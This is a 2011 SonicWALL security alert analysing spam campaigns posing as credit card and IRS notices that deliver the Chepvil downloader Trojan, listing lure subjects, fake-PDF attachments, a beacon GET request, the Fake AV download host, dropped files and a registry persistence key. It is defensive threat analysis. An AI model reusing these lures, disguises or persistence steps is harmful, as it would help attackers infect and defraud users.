Fake Credit Card and IRS notices (June 30, 2011)

SonicWALL UTM Research team observed two new spam campaigns in the past few days pretending to contain notices from a Credit Card company or the Internal Revenue Service (IRS). The e-mails contain Downloader Trojan Chepvil as attachment. Chepvil is a Trojan that silently downloads and installs malware components or other malware which includes Rouge AV. SonicWALL has received more than 100,000 copies of emails from these spam campaigns till now delivering 74 unique malicious binaries and it is still active at the time of writing this article.

Campaign #1 – Credit Card Overdue notice spam

Subject:

• Credit Card Overdue

Attachment: Customer details.zip (contains Customer details.exe)

The e-mail message looks like below:

Campaign #2 – IRS notification spam

Subject:

• IRS notification

Attachment: IRS document.zip (contains IRS document.exe)

The e-mail message looks like below:

The executable file inside the zip attachment has an icon disguised as a Acrobat Reader PDF file:

If the user downloads and executes the malicious executable inside the zip attachment, it performs the following activity:

• Creates a process SVCHOST.EXE and injects code into it.
• Deletes the original copy of the file.
• Reports the infected machine by sending the following GET request:
  GET /404.php?type=stats&affid=531&subid=01&awok HTTP/1.1
  User-Agent: IE
  Host: click(REMOVED).org
• Downloads Fake AV Trojan from a remote server mysteryforyou1.ru to the following location and executes it:
• (Application Data)dRBAHQLTbF.exe – [ detected as GAV: FakeAV.PSL (Trojan) ]
• Fake AV Trojan moves all the user programs into (TEMP)smtmp(N) [where N = 1,2,3..] periodically making them unavailable to the user and also hides the user files. Commands and features found in the analysis are shown below:

  

  Languages supported:

  

  More details about this Fake AV Trojan functionality can be found in one of our previous sonicalerts – Fake Desktop Utilities on the rise (June 8, 2011)

• Other dropped files include:
  • (TEMP)trol.exe – [ detected as GAV: Agent.SEO (Trojan) ]
  • (TEMP)javaw.exe – [ detected as GAV: Suspicious#polycrypt.4_2 (Worm) ]

• Registry modification to ensure Fake AV runs upon system reboot:
  • Key: HKEY_CURRENT_USERSoftwareMicrosoftWindows NTCurrentVersionRun
    Value: dRBAHQLTbF
    Data:(Application Data)dRBAHQLTbF.exe

SonicWALL Gateway AntiVirus blocks the spammed Downloader Trojan Chepvil proactively via following signature:

• GAV: Suspicious#Chepvil.K (Trojan)



Security News

The SonicWall Capture Labs Threat Research Team gathers, analyzes and vets cross-vector threat information from the SonicWall Capture Threat network, consisting of global devices and resources, including more than 1 million security sensors in nearly 200 countries and territories. The research team identifies, analyzes, and mitigates critical vulnerabilities and malware daily through in-depth research, which drives protection for all SonicWall customers. In addition to safeguarding networks globally, the research team supports the larger threat intelligence community by releasing weekly deep technical analyses of the most critical threats to small businesses, providing critical knowledge that defenders need to protect their networks.